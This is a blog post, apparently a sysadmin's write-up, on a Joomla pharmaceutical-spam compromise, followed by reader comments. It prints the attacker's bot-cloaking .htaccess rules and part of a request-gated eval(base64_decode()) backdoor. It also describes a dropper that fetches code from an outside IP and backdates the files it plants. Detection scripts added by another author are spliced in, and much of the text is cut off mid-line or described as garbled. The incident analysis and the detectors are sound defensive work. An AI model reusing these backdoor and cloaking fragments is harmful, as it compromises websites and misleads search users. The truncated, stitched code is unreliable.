
Joomla ‘Pharma’ Hack « Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/


Internet Thoughts

July 23, 2012

One of the more CSI type things I get to do in my job is figure out how servers a[…] […]uring out why a site was listing Pharmaceuticals in Google results. I’ve dealt a lot with hacked and compromised servers, but have never come acro[…] Basically, 3 modified files kept appearing on the server, a modified .htaccess file […] What we discovered was the following in the .htaccess file:

    # Apache search queries statistic module
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|craw[…]
    RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|[…]
    RewriteCond %{REQUEST_URI} /$ [OR]
    RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|p[…]
    RewriteCond %{REQUEST_FILENAME} !common.php
    RewriteCond %{DOCUMENT_ROOT}/common.php -f
    RewriteRule ^.*$ /common.php [L]
    </IfModule>


What this means is that any search bot will get redirected through common.php[…] that modified page meta descriptions and titles. This is outlined pretty well here: […]macy-hack.html. However, we deleted these files and modified the .htaccess file back to its origin[…] big question was how? I did a search through the Joomla source for base64_encode/decode and found […]or core, but I did find a few that looked a little odd. For example:

    /**GnPvQdChUa*/if((md5($_REQUEST["img_id"]) == "ae6d32585e[…]

Basically what this does is run whatever is passed in the $_REQUEST["mod_co[…] any base64_encoded string will be run as is. At 6:22 on a sunny Saturday morning, I got a notification from one of my monito[…]
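To look for both artefacts described above (the bot-only RewriteRule funnelling every page into common.php, and the md5-gated eval(base64_decode()) of a request parameter) without grepping each file by hand, here is an added Python checker. It is example code written for this page, not anything from the post; its sample .htaccess and PHP strings are constructed, and the hash and the parameter name mod_code are made up because the post's snippet is truncated.

```python
import re

# Constructed sample .htaccess modelled on the rule block in the post (not the
# original file): bot user agents or search-engine referers get every request
# rewritten to common.php, while ordinary visitors see the normal site.
SAMPLE_HTACCESS = """# Apache search queries statistic module
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|crawler) [NC,OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search) [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}/common.php -f
RewriteRule ^.*$ /common.php [L]
</IfModule>
"""
# Benign rewrite for comparison: no bot condition, no single-file funnel.
CLEAN_HTACCESS = "RewriteEngine On\nRewriteRule ^(.*)$ index.php?q=$1 [L,QSA]\n"

# Constructed sample of the gate from the post: md5 of a request parameter
# checked against a hard-coded hash, then eval(base64_decode()) of another
# parameter. The hash and the name "mod_code" are made up for this demo.
SAMPLE_PHP = ('/**GnPvQdChUa*/if((md5($_REQUEST["img_id"]) == '
              '"0123456789abcdef0123456789abcdef")){eval(base64_decode('
              '$_REQUEST["mod_code"]));}')
CLEAN_PHP = '<?php $t = md5($_REQUEST["q"]); echo htmlspecialchars($t);'

BOT_COND = re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}\s+\S*"
                      r"(google|yahoo|bing|aol|msn|craw)", re.I)
FUNNEL = re.compile(r"RewriteRule\s+\S+\s+(/?\S+\.php)\b", re.I)
MD5_GATE = re.compile(r'md5\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\s*\[[^\]]+\]'
                      r'\s*\)\s*={2,3}\s*"[0-9a-f]{8,32}"', re.I)
EVAL_B64 = re.compile(r'eval\s*\(.{0,80}?base64_decode\s*\(\s*'
                      r'\$_(REQUEST|GET|POST|COOKIE)', re.I | re.S)

def htaccess_cloaking_target(text):
    """Return the PHP file search-bot traffic is funnelled into, or None."""
    if not BOT_COND.search(text):
        return None
    m = FUNNEL.search(text)
    return m.group(1) if m else None

def php_backdoor_indicators(src):
    """List the backdoor traits present in one PHP source string."""
    hits = []
    if MD5_GATE.search(src):
        hits.append("md5-gated request parameter")
    if EVAL_B64.search(src):
        hits.append("eval(base64_decode(request parameter))")
    return hits
```

Run the two functions over every .htaccess and .php under the web root; a hit on either is worth a manual look, since legitimate code rarely compares md5($_REQUEST[...]) against a literal hash.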

1 de 6

08/09/2013 8:21

back! I checked the logs and sure enough, here is what the request was:

    /components/com_users/users.php?img_id=1f3870be274f6c[…]

That param decodes to a lovely PHP script:

    [The 52-line decoded script is garbled in this copy and cannot be restored line by line. Its surviving fragments show the structure: if extension_loaded("curl") it uses curl_init()/curl_setopt() with CURLOPT_URL, CURLOPT_USERAGENT "Mozilla/4.0 (compa[…]", CURLOPT_HEADER 0 and CURLOPT_RETURNTRANSFER 1 to curl_exec() three downloads from http://209.190.20.51/ (paths truncated in this copy: door.t[…], inc[…]) into $door, $inc_code and $inc_ht, otherwise it fetches the same URLs with @file_get_contents(); it then picks an existing file in /home/user/public_html/ (index.php, index.html, index.htm, favicon.ico, .htaccess or common.php) as $index and records filemtime($index) and the last four octal digits of fileperms($index); it @unlink()s common.php and .htaccess, writes $door into a new common.php and a $htaccess built by str_replace("#####INCLUDE#####", $inc_ht, …) into a new .htaccess with fopen()/fputs()/fclose(); and finally @chmod()s and touch()es both new files with the saved permissions and timestamp, so they match the neighbouring files in a directory listing.]

This little script is what recreates all the spammy files.
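Because the dropper re-applies the original file's filemtime() and fileperms() to the files it rewrites, a listing sorted by modification date looks clean. An added detection idea (my example, not from the post): PHP's touch() can set mtime but cannot set the inode change time, so compare ctime against mtime. It assumes a POSIX filesystem where st_ctime is change time, not creation time.

```python
import os
import stat
import tempfile
import time

def backdated_files(root, min_gap=3600):
    """Return (path, seconds) for regular files under root whose inode change
    time (ctime) is more than min_gap seconds newer than their mtime.

    touch($path, $time) in PHP, like touch -d in the shell, can set mtime to
    any value, but ctime is maintained by the kernel and is bumped by that
    very call, so a freshly written file wearing an old mtime stands out.
    """
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                      # vanished or unreadable: skip
            if not stat.S_ISREG(st.st_mode):
                continue
            gap = st.st_ctime - st.st_mtime
            if gap > min_gap:
                flagged.append((path, gap))
    return flagged

def demo():
    """Constructed demo in a temp dir: index.php written normally, common.php
    written and then backdated 30 days the way the dropper does. Returns the
    base names that backdated_files() flags."""
    root = tempfile.mkdtemp(prefix="pharma-demo-")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php // untouched\n")
    planted = os.path.join(root, "common.php")
    with open(planted, "w") as fh:
        fh.write("<?php // planted\n")
    old = time.time() - 30 * 86400            # pretend it is a month old
    os.utime(planted, (old, old))             # same effect as touch($f, $time)
    return sorted(os.path.basename(p) for p, _ in backdated_files(root))

if __name__ == "__main__":
    print(demo())
```

Large legitimate gaps also occur after chmod or chown runs and after package upgrades that preserve timestamps, so treat a hit as a lead to inspect, not proof of tampering.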

So there it is, a URL param that runs CURL requests to set up spam files on a s[…] Wanted to record this so that anyone else having this issue has somewhere to lo[…] TTFN.

This entry was posted in Code, Joomla.

8 COMMENTS

Luc | July 25, 2012 at 12:32 pm
Hi I have the same on my site. Which is the first file created and what is the best way to prevent this attack?

petetasker | July 25, 2012 at 1:50 pm
Change all your FTP, Joomla passwords and I would disable Jumi or Sourcerer […] Best way to prevent it is to keep Joomla patched and up to date and don’t instal[…] of.. Check out the vulnerable extensions list (http://docs.joomla.org/Vulnerable_Exte[…] […]cure upload form that was included in a page using Jumi. Also, search the source code for any base64_encode() or eval() statements, too. […] search for a mod_joomla.php in my case. Maybe […]

FlyingPizzas | November 8, 2012 at 5:51 pm
Found out that if you rename your admin folder to something other […] (hasn’t shown up after the usual couple of hours at least…).

sam | November 19, 2012 at 11:21 am
Found the same hack on a Drupal site. After sifting through server logs, […] it was a good start. Thanks for your post as it helped us to identify the pro[…]

Stacy Holmstedt | November 24, 2012 at 7:39 pm
Looks like this has hit WordPress now. I noticed a few hacked files in my wp-themes folde[…] […]stall-list-table.php. I also noticed an empty folder called .logs in my root and wonder if that […] elsewhere). Hacked files start with <?php and some md[…] running wp-cron.php and wp-admin/load-styles.php […] because even after rem[…] file came back. Thanks for the post.

petetasker | November 28, 2012 at 3:54 pm
Ya the site that was originally infected was moved to another webhost and thing[…] I’m thinking it has something to do with log files as well.

Erik Stenman | February 7, 2013 at 12:31 am
I found a file located at /en/rss.[…] […]txt there’s a folder called “coo[…] new files. Instead of coockies.php containing a remote access terminal.

aquaholic | February 7, 2013 at 8:08 pm
I had this same problem recently and got rid of the three files you mention at the beginning of […] later it is back. These files no longer exist but the problem is back. Any idea what to look for? I am not nearly as techie with the scripts and looking at logs so some good old fashioned han[…] Many thanks, Houston
